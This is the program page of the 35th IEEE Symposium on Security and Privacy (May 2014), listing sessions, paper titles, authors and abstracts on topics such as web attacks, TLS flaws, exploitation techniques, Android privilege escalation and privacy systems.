MAY 18-21, 2014 AT THE FAIRMONT, SAN JOSE, CA

35th IEEE Symposium on Security and Privacy

   Register

Click on any paper title to view its abstract.

May 18


Registration and Reception

04:00PM - 07:00PM

May 19


Breakfast

07:00AM - 08:00AM

Opening Remarks

08:00AM - 08:15AM

Session: Attacks 1

08:15AM - 10:00AM

Hunting the Red Fox Online: Understanding and Detection of Mass Redirect-Script Injections
Zhou Li (RSA Laboratories), Sumayah Alrwais, XiaoFeng Wang, and Eihal Alowaisheq (Indiana University Bloomington)
Compromised websites that redirect web traffic to malicious hosts play a critical role in organized web crimes, serving as doorways to all kinds of malicious web activities (e.g., drive-by downloads, phishing etc.). They are also among the most elusive components of a malicious web infrastructure and extremely difficult to hunt down, due to the simplicity of redirect operations, which also happen on legitimate sites, and extensive use of cloaking techniques. Making the detection even more challenging is the recent trend of injecting redirect scripts to JavaScript (JS) files, as those files are not indexed by search engines and their infections are therefore more difficult to catch. In our research, we look at the problem from a unique angle: the adversary's strategy and constraints for deploying redirect scripts quickly and stealthily. Specifically, we found that such scripts are often blindly injected into both JS and HTML files for a rapid deployment, changes to the infected JS files are often made minimum to evade detection and also many JS files are actually JS libraries (JS-libs) whose uninfected versions are publicly available.

Based upon those observations, we developed JsRED, a new technique for automatic detection of unknown redirect-script injections. Our approach analyzes the difference between a suspicious JS-lib file and its clean counterpart to identify malicious redirect scripts, and further searches for similar scripts in other JS and HTML files. This simple, lightweight approach is found to work effectively against redirect injection campaigns: our evaluation shows that JsRED captured most of compromised websites with almost no false positives, significantly outperforming a commercial detection service in terms of finding unknown JS infections. Based upon the compromised websites reported by JsRED, we further conducted a measurement study that reveals interesting features of redirect payloads and a new Peer-to-Peer network the adversary constructed to evade detection.
Stealing Webpages Rendered on Your Browser by Exploiting GPU Vulnerabilities
Sangho Lee, Youngsok Kim, Jangwoo Kim, and Jong Kim (POSTECH)
Graphics processing units (GPUs) are important components of modern computing devices for not only graphic rendering but also efficient parallel computations. However, their security problems are not much concerned despite of their importance and popularity. In this paper, we first perform an in-depth security analysis on GPUs to detect security vulnerabilities. We detect that contemporary, widely-used GPUs, both NVIDIA's and AMD's, do not initialize newly allocated GPU memory pages which may contain sensitive user data. We propose attack methods that can reveal the GPU memory of a victim program both during its execution and right after its termination by exploiting the vulnerabilities. We show high applicability of the proposed attacks by applying them to the Chromium and Firefox web browsers which utilize GPUs for accelerating webpage rendering. We detect that both browsers leave webpage textures in the GPU memory so that we can infer which webpages a victim user visits by analyzing them. The accuracy of our advanced inference attacks is up to 95.4%.
All Your Screens Are Belong to Us: Attacks Exploiting the HTML5 Screen Sharing API
Yuan Tian, Ying-Chuan Liu, Amar Bhosale, Lin-Shung Huang, Patrick Tague, and Collin Jackson (Carnegie Mellon University)
HTML5 changes many aspects in the browser world by introducing numerous new concepts; in particular, the new HTML5 screen sharing API impacts the security implications of browsers tremendously. One of the core assumptions on which browser security is built is that there is no cross-origin feedback loop from the client to the server. However, the screen sharing API allows creating a cross-origin feedback loop. Consequently, websites will be able to see all visible content from the user's screen, irrespective of its origin. This cross-origin feedback loop, when combined with human sight limitations, can introduce new vulnerabilities. An attacker could capture sensitive information from victim's screen using the new API without the consensus of the victim. We investigate the security implications of the screen sharing API and discuss how existing defenses against traditional web attacks fail during screen sharing. We show that several attacks are possible with the help of the screen sharing API: cross-site request forgery, history sniffing, and information stealing. We discuss how popular websites such as Amazon and Wells Fargo can be attacked using this API and demonstrate the consequences of the attacks such as economic losses, compromised account and information disclosure. The objective of this paper is to present the attacks with the screen sharing API, analyze the fundamental cause and motivate potential defenses to design a more secure screen sharing API.
Chip and Skim: Cloning EMV Cards with the Pre-Play Attack
Mike Bond, Omar Choudary, Steven J. Murdoch, Sergei Skorobogatov, and Ross Anderson (University of Cambridge)
EMV, also known as 'Chip and PIN', is the leading system for card payments worldwide. It is used throughout Europe and much of Asia, and is starting to be introduced in North America too. Payment cards contain a chip so they can execute an authentication protocol. This protocol requires point-of-sale (POS) terminals or ATMs to generate a nonce, called the unpredictable number, for each transaction to ensure it is fresh. We have discovered two serious problems with EMV: a widespread implementation flaw and a deeper, more difficult protocol flaw.

The first flaw is that some EMV implementers have merely used counters, timestamps or home-grown algorithms to supply this number. This exposes them to a 'pre-play' attack which is indistinguishable from card cloning from the standpoint of the logs available to the card-issuing bank, and can be carried out even if it is impossible to clone a card physically (in the sense of extracting the key material and loading it into another card). Card cloning is the very type of fraud that EMV was supposed to prevent. We describe how we detected the vulnerability, a survey methodology we developed to chart the scope of the weakness, evidence from ATM and terminal experiments in the field, and our implementation of proof-of-concept attacks. We found flaws in widely-used ATMs from the largest manufacturers. We can now explain at least some of the increasing number of frauds in which victims are refused refunds by banks which claim that EMV cards cannot be cloned and that a customer involved in a dispute must therefore be mistaken or complicit.

The second problem was exposed by the above work. It is a protocol failure and independent of the random number generator quality: pre-play attacks may also be carried out by malware in an ATM or POS terminal, or by a man-in-the-middle between the terminal and the acquirer. In this case the actual random number generated by the terminal is simply replaced by one known to the attacker. We explore the design and implementation mistakes that enabled these flaws to evade detection until now: shortcomings of the EMV specification, of the EMV kernel certification process, of implementation testing, formal analysis, and monitoring customer complaints. Finally we discuss countermeasures. More than a year after our initial responsible disclosure of these flaws to the banks, action has only been taken to mitigate the first of them, while the spread of ATM and POS malware is making the second ever more serious.

Break

10:00AM - 10:30AM

Session: SSL/TLS

10:30AM - 12:15PM

When HTTPS Meets CDN: A Case of Authentication in Delegated Service
Jinjin Liang and Jian Jiang (Department of Computer Science and Technology, Tsinghua University), Haixin Duan (Institute for Network Science and Cyberspace, Tsinghua University), Kang Li (Department of Computer Science, University of Georgia), Tao Wan (Huawei Canada), and Jianping Wu (Department of Computer Science and Technology, Tsinghua University)
Content Delivery Network (CDN) and Hypertext Transfer Protocol Secure (HTTPS) are two popular but independent web technologies, each of which has been well studied individually and independently. This paper provides a systematic study on how these two work together. We examined 20 popular CDN providers and 10,721 of their customer web sites using HTTPS. Our study reveals various problems with the current HTTPS practice adopted by CDN providers, such as widespread use of invalid certificates, private key sharing, neglected revocation of stale certificates, and insecure back-end communication. While some of those problems are operational issues only, others are rooted in the fundamental semantic conflict between the end-to-end nature of HTTPS and the man-in-the-middle nature of CDN involving multiple parties in a delegated service. To address the delegation problem when HTTPS meets CDN, we proposed and implemented a lightweight solution based on DANE (DNS-based Authentication of Named Entities), an emerging IETF protocol complementing the current webPKI model. Our implementation demonstrates that it is feasible for HTTPS to work with CDN securely and efficiently. This paper intends to provide a context for future discussion within security and CDN community on more preferable solutions.
Analyzing Forged SSL Certificates in the Wild
Lin-Shung Huang (Carnegie Mellon University), Alex Rice and Erling Ellingsen (Facebook), and Collin Jackson (Carnegie Mellon University)
The SSL man-in-the-middle attack uses forged SSL certificates to intercept encrypted connections between clients and servers. However, due to a lack of reliable indicators, it is still unclear how commonplace these attacks occur in the wild. In this work, we have designed and implemented a method to detect the occurrence of SSL man-in-the-middle attack on a top global website. Over 3 million real-world SSL connections to this website were analyzed. Our results indicate that 0.2% of the SSL connections analyzed were tampered with forged SSL certificates, most of them related to antivirus software and corporate-scale content filters. We have also identified some SSL connections intercepted by malware. Limitations of the method and possible defenses to such attacks are also discussed.
Triple Handshakes and Cookie Cutters: Breaking and Fixing Authentication over TLS
Karthikeyan Bhargavan and Antoine Delignat-Lavaud (INRIA Paris-Rocquencourt), Cédric Fournet (Microsoft Research), Alfredo Pironti (INRIA Paris-Rocquencourt), and Pierre-Yves Strub (IMDEA Software Institute)
TLS was designed as a transparent channel abstraction to allow developers with no cryptography expertise to protect their application against attackers that may control some clients, some servers, and may have the capability to tamper with network connections. However, the security guarantees of TLS do not match this channel abstraction, leading to a variety of attacks. We show how some widespread false beliefs about these guarantees can be exploited, not only to attack applications that rely too naively on TLS, but also to defeat several standard authentication methods that rely on TLS. Concretely, we demonstrate new client impersonation attacks against TLS renegotiation, wireless networks, challenge-response protocols, and channel-bound cookies. Our attacks exploit combinations of RSA and DHE key exchange, session resumption, and renegotiation to bypass many recent countermeasures. We also demonstrate new ways to exploit known weaknesses of HTTP over TLS. We investigate the root causes for these attacks and propose new countermeasures. At the protocol level, we present the design and implementation of two new TLS extensions that strengthen the authentication guarantees of the TLS handshake. At the application level, we develop on top of a previously verified TLS implementation an exemplary HTTPS client library that implements several mitigations, and verify that it does provide strong, simple application security.

Best Practical Paper Award

Using Frankencerts for Automated Adversarial Testing of Certificate Validation in SSL/TLS Implementations
Chad Brubaker and Suman Jana (University of Texas at Austin), Baishakhi Ray (University Of California Davis), and Sarfraz Khurshid and Vitaly Shmatikov (University of Texas at Austin)
Modern network security rests on the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols. Distributed systems, mobile and desktop applications, embedded devices, and all of secure Web rely on SSL/TLS implementations such as OpenSSL, NSS, CyaSSL, GnuTLS, PolarSSL, MatrixSSL, etc. for protection against active and passive network attacks. This protection critically depends on whether SSL/TLS clients correctly validate the X.509 certificate presented by the server during the SSL/TLS handshake protocol. Certificate validation is extremely complex, involving dozens of checks on various certificate constraints, extensions, certificate authorities, etc.

We design, implement, and apply the first methodology for large-scale adversarial testing of certificate validation logic in SSL/TLS implementations. Our first contribution is 'frankencerts', synthetic certificates randomly mutated from parts of real certificates. By construction, frankencerts include unusual combinations of extensions, constraints, and certificate authorities, rare and malformed extension values, etc. Testing SSL/TLS implementations with millions of frankencerts elicits behaviors that do not manifest during conventional testing. Our second ingredient is differential testing: if one SSL/TLS implementation accepts a certificate while another rejects the same certificate, one of them must be wrong. We use such discrepancies as an oracle for finding flaws in individual implementations. Testing with frankencerts uncovered many serious vulnerabilities in SSL/TLS implementations. For example, any server with a valid X.509 version 1 certificate (we observed thousands of such certificates 'in the wild') can act as a rogue certificate authority and issue fake certificates for any domain, enabling man-in-the-middle attacks against MatrixSSL. Another, very subtle bug causes GnuTLS, too, to unintentionally accept rogue version 1 certificate authorities. GnuTLS also accepts certificate authorities created by issuers who are not authorized to create such authorities. Code signing certificates, not intended for server authentication, are accepted by GnuTLS, CyaSSL, and PolarSSL.

Our differential mutation testing discovered a total of 208 discrepancies between SSL/TLS implementations. We also found serious vulnerabilities in how SSL/TLS implementations and Web browsers warn users about certificate validation errors. When presented with an expired, self-signed certificate, NSS, Safari, and Chrome (on Linux) report that the certificate has expired — a low-risk, often ignored error — but not that the connection is insecure against a man-in-the-middle attack. These results demonstrate that automated adversarial testing with frankencerts is a powerful methodology for discovering deep security flaws in SSL/TLS implementations.

Lunch

12:15PM - 01:30PM

Session: Automation

01:30PM - 03:15PM

Automating Isolation and Least Privilege in Web Services
Aaron Blankstein and Michael J. Freedman (Princeton University)
In many client-facing applications, a vulnerability in any part can compromise the entire application. This paper describes the design and implementation of Passe, a system that protects a data store from unintended data leaks and unauthorized writes even in the face of application compromise. Passe automatically splits (previously shared-memory-space) applications into sandboxed processes. Passe limits communication between those components and the types of accesses each component can make to shared storage, such as a backend database. In order to limit components to their least privilege, Passe uses dynamic analysis to learn data and control-flow relationships between database queries and previous query results, and it then strongly enforces those relationships.

Our prototype of Passe acts as a drop-in replacement for the Django web framework. By running eleven unmodified, off-the-shelf applications in Passe, we demonstrate its ability to provide strong security guarantees — Passe correctly enforced 96% of the applications’ policies — with little additional overhead. Additionally, in the web-specific setting of the prototype, we also mitigate the cross-component effects of cross-site scripting (XSS) attacks by combining browser HTML5 sandboxing techniques with our automatic component separation.
Hidden GEMs: Automated Discovery of Access Control Vulnerabilities in Graphical User Interfaces
Collin Mulliner, William Robertson, and Engin Kirda (Northeastern University)
Graphical user interfaces (GUIs) are the predominant means by which users interact with modern programs. GUIs contain a number of common visual elements or widgets such as labels, textfields, buttons, and lists, and GUIs typically provide the ability to set attributes on these widgets to control their visibility, enabled status, and whether they are writable. While these attributes are extremely useful to provide visual cues to users to guide them through an application's GUI, they can also be misused for purposes they were not intended. In particular, in the context of GUI-based applications that include multiple privilege levels within the application, GUI element attributes are often misused as a mechanism for enforcing access control policies.

In this work, we introduce GEMs, or instances of GUI element misuse, as a novel class of access control vulnerabilities in GUI-based applications. We present a classification of different GEMs that can arise through misuse of widget attributes, and describe a general algorithm for identifying and confirming the presence of GEMs in vulnerable applications. We then present GEM Miner, an implementation of our GEM analysis for the Windows platform. We evaluate GEM Miner over a test set of three complex, real-world GUI-based applications targeted at the small business and enterprise markets, and demonstrate the efficacy of our analysis by finding numerous previously unknown access control vulnerabilities in these applications. We have reported the vulnerabilities we discovered to the developers of each application, and in one case have received confirmation of the issue.
Automated Analysis of Security Protocols with Global State
Steve Kremer (INRIA Nancy) and Robert Künnemann (TU Darmstadt)
Security APIs, key servers and protocols that need to keep the status of transactions, require to maintain a global, non-monotonic state, e.g., in the form of a database or register. However, existing automated verification tools do not support the analysis of such stateful security protocols – sometimes because of fundamental reasons, such as the encoding of the protocol as Horn clauses, which are inherently monotonic. An exception is the recent tamarin prover which allows specifying protocols as multiset rewrite (MSR) rules, a formalism expressive enough to encode state. As multiset rewriting is a 'low-level' specification language with no direct support for concurrent message passing, encoding protocols correctly is a difficult and error-prone process.

We propose a process calculus which is a variant of the applied pi calculus with constructs for manipulation of a global state by processes running in parallel. We show that this language can be translated to MSR rules whilst preserving all security properties expressible in a dedicated first-order logic for security properties. The translation has been implemented in a prototype tool which uses the tamarin prover as a backend. We apply the tool to several case studies among which a simplified fragment of PKCS#11, the Yubikey security token, and an optimistic contract signing protocol.
Automated Verification of Group Key Agreement Protocols
Benedikt Schmidt (IMDEA Software Institute, Madrid, Spain), Ralf Sasse (Institute of Information Security, ETH Zürich), Cas Cremers (University of Oxford), and David Basin (Institute of Information Security, ETH Zürich)
We advance the state-of-the-art in automated symbolic cryptographic protocol analysis by providing the first algorithm that can handle Diffie-Hellman exponentiation, bilinear pairing, and AC-operators. Our support for AC-operators enables protocol specifications to use multisets, natural numbers, and finite maps. We implement the algorithm in the Tamarin prover and provide the first symbolic correctness proofs for group key agreement protocols that use Diffie-Hellman or bilinear pairing, loops, and recursion, while at the same time supporting advanced security properties, such as perfect forward secrecy or eCK-security. We automatically verify a set of protocols, including the STR, group Joux, and GDH protocols, thereby demonstrating the effectiveness of our approach.

Break

03:15PM - 03:45PM

Session: Attacks 2

03:45PM - 05:30PM

Practical Evasion of a Learning-Based Classifier: A Case Study
Nedim Šrndić and Pavel Laskov (University of Tuebingen)
Learning-based classifiers are increasingly used for detection of various forms of malicious data. However, if they are deployed online, an attacker may attempt to evade them by manipulating the data. Examples of such attacks have been previously studied under the assumption that an attacker has full knowledge about the deployed classifier. In practice, such assumptions rarely hold, especially for the systems deployed online. A significant amount of information about a deployed classifier system can be obtained from various sources. In this paper, we experimentally investigate the effectiveness of classifier evasion using a real deployed system PDFrate as a test case. We develop a taxonomy for practical evasion strategies and adapt known evasion algorithms to implement specific scenarios in our taxonomy. Our experimental results reveal a substantial drop of PDFrate's classification scores and detection accuracy after it is exposed even to simple attacks. We further study potential defense mechanisms against classifier evasion. Our experiments reveal that the original technique proposed for PDFfrate is only effective if the executed attack exactly matches the anticipated one. In the discussion of the findings of our study, we analyze some potential techniques for increasing robustness of learning-based systems against adversarial manipulation of data.
Doppelgänger Finder: Taking Stylometry To The Underground
Sadia Afroz (UC Berkeley), Aylin Caliskan-Islam, Ariel Stolerman, and Rachel Greenstadt (Drexel University), and Damon McCoy (George Mason University)
Stylometry is a method for identifying anonymous authors of anonymous texts by analyzing their writing style. While stylometric methods have produced impressive results in previous experiments, we wanted to explore their performance on a challenging dataset of particular interest to the security research community. Analysis of underground forums can provide key information about who controls a given bot network or sells a service, and the size and scope of the cybercrime underworld. Previous analyses have been accomplished primarily through analysis of limited structured metadata and painstaking manual analysis. However, the key challenge is to automate this process, since this labor intensive manual approach clearly does not scale.

We consider two scenarios. The first involves text written by an unknown cybercriminal and a set of potential suspects. This is standard, supervised stylometry problem made more difficult by multilingual forums that mix l33t-speak conversations with data dumps. In the second scenario, you want to feed a forum into an analysis engine and have it output possible doppelgängers, or users with multiple accounts. While other researchers have explored this problem, we propose a method that produces good results on actual separate accounts, as opposed to data sets created by artificially splitting authors into multiple identities.

For scenario 1, we achieve 77.2% to 84% accuracy on private messages. For scenario 2, we achieve 94% recall with 90.38% precision on blogs and 85.18% recall with 82.14% precision for underground forum users. We demonstrate the utility of our approach with a case study that includes applying our technique to the Carders forum and manual analysis to validate the results, enabling the discovery of previously undetected doppelgänger accounts.
Hacking Blind
Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazières, and Dan Boneh (Stanford)
We show that it is possible to write remote stack buffer overflow exploits without possessing a copy of the target binary or source code, against services that restart after a crash. This makes it possible to hack proprietary closed-binary services, or open-source servers manually compiled and installed from source where the binary remains unknown to the attacker. Traditional techniques are usually paired against a particular binary and distribution where the hacker knows the location of useful gadgets for Return Oriented Programming (ROP). Our Blind ROP (BROP) attack instead remotely finds enough ROP gadgets to perform a write system call and transfers the vulnerable binary over the network, after which an exploit can be completed using known techniques. This is accomplished by leaking a single bit of information based on whether a process crashed or not when given a particular input string. BROP requires a stack vulnerability and a server that restarts after a crash. We implemented Braille, a fully automated exploit that yielded a shell in under 4,000 requests (20 minutes) against a contemporary nginx vulnerability, yaSSL + MySQL, and a toy proprietary server written by a colleague. The attack works against modern 64-bit Linux with address space layout randomization (ASLR) and no-execute page protection (NX).

Best Student Paper Award (of Two)

Framing Signals — A Return to Portable Shellcode
Erik Bosman and Herbert Bos (Vrije Universiteit Amsterdam)
Signal handling has been an integral part of UNIX systems since the earliest implementation in the 1970s. Nowadays, we find signals in all common flavors of UNIX systems, including BSD, Linux, Solaris, Android, and Mac OS. While each flavor handles signals in slightly different ways, the implementations are very similar. In this paper, we show that signal handling can be used as an attack method in exploits and backdoors. The problem has been a part of UNIX from the beginning, and now that advanced security measures like ASLR, DEP and stack cookies have made simple exploitation much harder, our technique is among the lowest hanging fruit avalailable to an attacker.

Specifically, we describe Sigreturn Oriented Programming (SROP), a novel technique for exploits and backdoors in UNIX-like systems. Like return-oriented programming (ROP), sigreturn oriented programming constructs what is known as a ‘weird machine’ that can be programmed by attackers to change the behavior of a process. To program the machine, attackers set up fake signal frames and initiate returns from signals that the kernel never really delivered. This is possible, because UNIX stores signal frames on the process’ stack. Sigreturn oriented programming is interesting for attackers, OS developers and academics. For attackers, the technique is very versatile, with pre-conditions that are different from those of existing exploitation techniques like ROP. Moreover, unlike ROP, sigreturn oriented programming programs are portable. For OS developers, the technique presents a problem that has been present in one of the two main operating system families from its inception, while the fixes (which we also present) are non-trivial. From a more academic viewpoint, it is also interesting because we show that sigreturn oriented programming is Turing complete.

We demonstrate the usefulness of the technique in three applications. First, we describe the exploitation of a vulnerable web server on different Linux distributions. Second, we build a very stealthy proof-of-concept backdoor. Third, we use SROP to bypass Apple’s code signing and security vetting process by building an app that can execute arbitrary system calls. Finally, we discuss mitigation techniques.

Poster Reception

05:45PM - 07:45PM

A program for posters is now available.

May 20


Breakfast

07:00AM - 08:00AM

Awards

08:00AM - 08:15AM

The best paper awards have been announced.

Session: Systems Security

08:15AM - 10:00AM

Pivot is a new JavaScript isolation framework for web applications. Pivot uses iframes as its low-level isolation containers, but it uses code rewriting to implement synchronous cross-domain interfaces atop the asynchronous cross-frame postMessage() primitive. Pivot layers a distributing scheduling abstraction across the frames, essentially treating each frame as a thread which can invoke RPCs that are serviced by external threads. By rewriting JavaScript call sites, Pivot can detect RPC invocations; Pivot exchanges RPC requests and responses via postMessage(), and it pauses and restarts frames using a novel rewriting technique that translates each frame's JavaScript code into a restartable generator function. By leveraging both iframes and rewriting, Pivot does not need to rewrite all code, providing an order-of-magnitude performance improvement over rewriting-only solutions. Compared to iframe-only approaches, Pivot provides synchronous RPC semantics, which developers typically prefer over asynchronous RPCs; Pivot also allows developers to use the full, unrestricted JavaScript language, including powerful statements like eval().
SoK: Automated Software Diversity
Per Larsen, Andrei Homescu, Stefan Brunthaler, and Michael Franz (UC Irvine)
The protective qualities of software diversity has been known for at least three decades. Even so, more than two dozen papers related to software diversity has been published since 2008. The reason is simple: the weaknesses of commonly adopted defenses and the shift to Internet-based software distribution for traditional and mobile computer systems has caused a resurgence of interest in artificial software diversity. Software diversity offers several unique properties. Unlike many other defenses, it introduces uncertainty in the target. This is a fundamental assumptions that a wide range of attacks make; this makes diversity a broad rather than narrowly focused defense mechanism. Second, diversity offers probabilistic protection similar to cryptography — attacks may succeed by chance so security relies on high entropy. Finally, the design space of diversifying program transformations is large. As a result, researchers have proposed a diverse range of approaches to software diversity that varies with respect to threat models, security, performance and practicality.

In this paper, we survey the state-of-the-art in software diversity along these dimensions and highlight fundamental trade-offs between the approaches. We also point to unresolved challenges such as error reporting and software updating and information-leakage attacks on diversified software. Finally, we argue that the research community has not yet realized the full reach of software diversity as a protection mechanism and call for research into software diversity as a defense against side-channel attacks.
KCoFI: Complete Control-Flow Integrity for Commodity Operating System Kernels
John Criswell, Nathan Dautenhahn, and Vikram Adve (University of Illinois at Urbana-Champaign)
We present a new system, KCoFI, that is the first we know of to provide complete Control-Flow Integrity protection for commodity operating systems without using heavyweight complete memory safety. Unlike previous systems, KCoFI protects commodity operating systems from classical control-flow hijack attacks, return-to-user attacks, and code segment modification attacks. We formally verify a subset of KCoFI's design by modeling several features in small-step semantics and providing a partial proof that the semantics maintain control-flow integrity. The model and proof account for operations such as page table management, trap handlers, context switching, and signal delivery. Our evaluation shows that KCoFI prevents all the gadgets found by an open-source Return Oriented Programming (ROP) gadget-finding tool in the FreeBSD kernel from being used; it also reduces the number of indirect control-flow targets by 98.18%. Our evaluation also shows that the performance impact of KCoFI on web server bandwidth is negligible while file transfer bandwidth using OpenSSH is reduced by an average of 13%, and at worst 27%, across a wide range of file sizes. PostMark, an extremely file-system intensive benchmark, shows 2x overhead. Where comparable numbers are available, the overheads of KCoFI are far lower than heavyweight memory-safety techniques.
Dancing with Giants: Wimpy Kernels for On-demand Isolated I/O
Zongwei Zhou, Miao Yu, and Virgil Gligor (Carnegie Mellon University)
To be trustworthy, security-sensitive applications must be formally verified and hence small and simple (i.e., 'wimpy') . Thus they cannot rely on a variety of basic services available only in large commodity systems (i.e., in 'giants'). To survive, the wimps must securely compose with ('dance with') giants; i.e., rely on giants’ services but only after efficiently verifying their results. This paper presents a security architecture that provides a variety of on-demand isolated I/O channels for wimps, without bloating the underlying trusted computing base. We design and implement a wimpy kernel, which runs on the top of a micro-hypervisor and guarantees I/O channel isolation. We minimize the size and complexity of the wimpy kernel by safely outsourcing and deprivileging most device driver subsystem functions to an untrusted commodity OS and the user-level code. We illustrate the concrete implementation of the wimpy kernel for a major I/O subsystem, namely USB subsystem, and a variety of device drivers. Our experimental measurements exhibit the desired minimality and efficiency of the trusted base.

Break

10:00AM - 10:30AM

Session: Privacy and Anonymity

10:30AM - 12:15PM

Best Student Paper Award (of Two)

Bootstrapping Privacy Compliance in Big Data Systems
Shayak Sen (Carnegie Mellon University), Saikat Guha (Microsoft Research, India), Anupam Datta (Carnegie Mellon University), Sriram Rajamani (Microsoft Research, India), Janice Tsai (Microsoft Research, Redmond), and Jeannette Wing (Microsoft Research)
With the rapid increase in cloud services collecting and using user data to offer personalized experiences, ensuring that these services comply with their privacy policies has become a business imperative for building user trust. However, most compliance efforts in industry today rely on manual review processes and audits designed to safeguard user data, and therefore are resource intensive and lack coverage. In this paper, we present our experience building and operating a system to automate privacy policy compliance checking in a large online search engine. Central to the design of the system are (a) LEGALEASE — a language that allows specification of privacy policies that impose restrictions on how user data is handled; and (b) GROK — a data inventory for Map-Reduce-like big data systems that tracks how user data flows among programs by mapping code-level schema elements to datatypes in LEGALEASE, in essence, annotating existing programs with information flow types with minimal human input. Compliance checking is thus reduced to information flow analysis of big data systems. The system, bootstrapped by a small team, checks compliance daily of tens of millions of lines of ever-changing source code written by several thousand developers operating on many petabytes of data. The system has been in operational use for over a year.
Formal Analysis of Chaumian Mix Nets with Randomized Partial Checking
Ralf Kuesters and Tomasz Truderung (University of Trier) and Andreas Vogt (University of Applied Sciences Northwest Switzerland)
Mix nets with randomized partial checking (RPC mix nets) have been introduced by Jakobsson, Juels, and Rivest as particularly simple and efficient verifiable mix nets. These mix nets have been used in several implementations of prominent e-voting systems to provide vote privacy and verifiability. In RPC mix nets, higher efficiency is traded for a lower level of privacy and verifiability. However, these mix nets have never undergone a rigorous formal analysis. Recently, Kahazei and Wikström even pointed out several severe problems in the original proposal and in implementations of RPC mix nets in e-voting systems, both for so-called re-encryption and Chaumian RPC mix nets. While Kahazei and Wikström proposed several fixes, the security status of Chaumian RPC mix nets (with the fixes applied) has been left open; re-encryption RPC mix nets, as they suggest, should not be used at all.

In this paper, we provide the first formal security analysis of Chaumian RPC mix nets. We propose security definitions that allow one to measure the level of privacy and verifiability RPC mix nets offer, and then based on these definitions, carry out a rigorous analysis. Altogether, our results show that these mix nets provide a reasonable level of privacy and verifiability, and that they are still an interesting option for the use in e-voting systems.
Blind Seer: A Scalable Private DBMS
Vasilis Pappas (Columbia University), Fernando Krell (Columbia University), Binh Vo (Columbia University), Vladimir Kolesnikov (Bell Labs), Tal Malkin (Columbia University), Seung Geol Choi (United States Naval Academy), Wesley George (University of Toronto), Angelos Keromytis (Columbia University), and Steve Bellovin (Columbia University)
Query privacy in secure DBMS is an important feature, although rarely formally considered outside the theoretical community. Because of the high overheads of guaranteeing privacy in complex queries, almost all previous works addressing practical applications consider extremely limited queries (e.g., just keyword search), or provide an extremely weak guarantee of privacy. (In contrast, it is well known how to protect the DB data from unauthorized disclosure.)

In this work, we address a major open problem in private DB: efficient sublinear search for arbitrary Boolean queries. We consider scalable DBMS with provable security for all parties, including protection of the data from both server (who stores encrypted data) and client (who searches it), as well as protection of the SQL query, and access control for the query. We design, build, and evaluate the performance of a rich DBMS system, suitable for real-world deployment on today medium-to large-scale DBs. On a modern server, we are able to query a formula over 10TB, 100M-record DB, with 70 searchable index terms per DB row, in time comparable to (insecure) MySQL (many practical queries can be privately executed with work 1.2-3 times slower than MySQL).

We support a rich query set, including searching on arbitrary boolean formulas on keywords and ranges, support for stemming, and free keyword searches over text fields. We identify and permit a reasonable and controlled amount of leakage, proving that no further leakage is possible. In particular, we allow leakage of some search pattern information, but protect the query and data, provide a high level of privacy for individual terms in the executed search formula, and hide the difference between a query that returned no results and a query that returned a very small result set. We also support private and complex access policies, integrated in the search process so that a query with empty result set and a query that fails the policy are hard to tell apart. Ours is the first system that achieves this tradeoff of performance and privacy while supporting such a rich query set. Indeed, there has been no previous work achieving practical sublinear computation, arbitrary boolean formulas, and our level of provable privacy, even without implementation.
Anonize: A Large-Scale Anonymous Survey System
Susan Hohenberger (Johns Hopkins University), Steven Myers (Indiana University), Rafael Pass (Cornell University), and Abhi Shelat (University of Virginia)
A secure ad-hoc survey scheme enables a survey authority to — without any interaction — select an 'ad-hoc' group of registered users based only on their identities (e.g., their email addresses), and create a survey where those — and only those — users can anonymously complete exactly one submission.

We present a formalization of secure ad-hoc surveys and a provably-secure (based on specific intractability assumptions in the Random Oracle Model) implementation, called ANONIZE. Our performance analysis shows that ANONIZE enables securely implementing million-person anonymous surveys using a single modern workstation. As far as we know, ANONIZE constitutes the first implementation of a large-scale anonymous survey system that scales to millions of users.

Lunch

12:15PM - 01:30PM

Session: Android

01:30PM - 02:45AM

Upgrading Your Android, Elevating My Malware: Privilege Escalation Through Mobile OS Updating
Luyi Xing and Xiaorui Pan (Indiana University Bloomington), Rui Wang (Microsoft Research), and Kan Yuan and XiaoFeng Wang (Indiana University Bloomington)
Android is a fast evolving system, with new updates coming out one after another. These updates often completely overhaul a running system, replacing and adding tens of thousands of files across Android's complex architecture, in the presence of critical user data and applications (apps for short). To avoid accidental damages to such data and existing apps, the upgrade process involves complicated program logic, whose security implications, however, are less known. In this paper, we report the first systematic study on the Android updating mechanism, focusing on its Package Management Service (PMS). Our research brought to light a new type of security-critical vulnerabilities, called Pileup flaws, through which a malicious app can strategically declare a set of privileges and attributes on a low-version operating system (OS) and wait until it is upgraded to escalate its privileges on the new system. Specifically, we found that by exploiting the Pileup vulnerabilities, the app can not only acquire a set of newly added system and signature permissions but also determine their settings (e.g., protection levels), and it can further substitute for new system apps, contaminate their data (e.g., cache, cookies of Android default browser) to steal sensitive user information or change security configurations, and prevent installation of critical system services. We systematically analyzed the source code of PMS using a program verification tool and confirmed the presence of those security flaws on all Android official versions and over 3000 customized versions. Our research also identified hundreds of exploit opportunities the adversary can leverage over thousands of devices across different device manufacturers, carriers and countries. To mitigate this threat without endangering user data and apps during an upgrade, we also developed a new detection service, called SecUP, which deploys a scanner on the user's device to capture the malicious apps designed to exploit Pileup vulnerabilities, based upon the vulnerability-related information automatically collected from newly released Android OS images.
The Peril of Fragmentation: Security Hazards in Android Device Driver Customizations
Xiaoyong Zhou, Yeonjoon Lee, and Nan Zhang (School of Informatics and Computing, Indiana University, Bloomington), Muhammad Naveed (Department of Computer Science, University of Illinois at Urbana-Champaign), and Xiaofeng Wang (School of Informatics and Computing, Indiana University, Bloomington)
